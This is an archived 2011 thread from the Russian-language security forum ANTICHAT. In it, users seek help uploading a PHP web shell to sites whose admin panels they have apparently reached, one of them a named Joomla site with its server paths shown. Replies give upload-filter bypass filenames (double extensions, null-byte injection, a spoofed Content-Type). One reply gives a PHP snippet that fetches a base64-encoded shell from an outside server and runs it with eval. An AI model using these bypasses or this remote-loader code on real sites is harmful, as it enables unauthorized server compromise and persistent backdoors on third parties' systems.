ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.03.2011, 18:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Столкнулся с проблемой в админке есть функция загрузки картинок в галерею, ресайза нет, но добавляется расширение jpeg, и проверяется mime на image, только в одном случае, когда льешь ex.php.jpeg добавляется ex.txt. В галереи отображается картинка как надо, а когда по прямому пути, то исходник картинки+шелла. Может кто сталкивался, как обойти.
p.s. инклуда нет
|
|
|
|
26.03.2011, 19:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Сообщение от Moriarty
Moriarty said:
По движку ориентируйся. Галерея - наверняка модуль.
Двиг самопис, блок по белому списку.
|
|
|
|
26.03.2011, 20:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Lijzer
Lijzer said:
Двиг самопис, блок по белому списку.
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
|
|
|
26.03.2011, 21:23
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме:
2864
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
Нуль байт - уж слишком старомодно
скорее всего защита от такого есть
даже в самописном движке
|
|
|
|
26.03.2011, 22:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Сообщение от Tigger
Tigger said:
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
Четыре расширения в белом списке gif,jpg,jpeg,png. Льешь jpg>jpg на выходе.
Подделывал Content-Type на image/jpeg выкинуло ошибку.
Нижнии два варианта при первоначальном попадании в админку, не помогли
|
|
|
|
29.03.2011, 00:30
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Жумла
Права доступа на каталоги
Сообщение от None
administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/
Доступен для записи
Можно как-нить шелл залить? >_ |
|
|
|
29.03.2011, 00:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
23579
Репутация:
-5
|
|
да, ставиь в пхп модуль (через админку)
Код:
Code:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}
|
|
|
|
29.03.2011, 00:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
4616
Репутация:
0
|
|
что делать пробую залить шелл шелл.пшп.джпег но его в постледствие залива переименовывает на какой нить нв3-1.джпег и он не запускается! как обойти или мож я чето не так делаю??
|
|
|
|
29.03.2011, 01:05
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от rootmd
rootmd said:
да, ставиь в пхп модуль (через админку)
Код:
Code:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}
куда\что именно? модули залить нельзя
|
|
|
|
29.03.2011, 10:08
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
[QUOTE="None"]
Жумла
Права доступа на каталоги
Цитата:
administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/ Доступен для записи
Можно как-нить шелл залить? >__
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
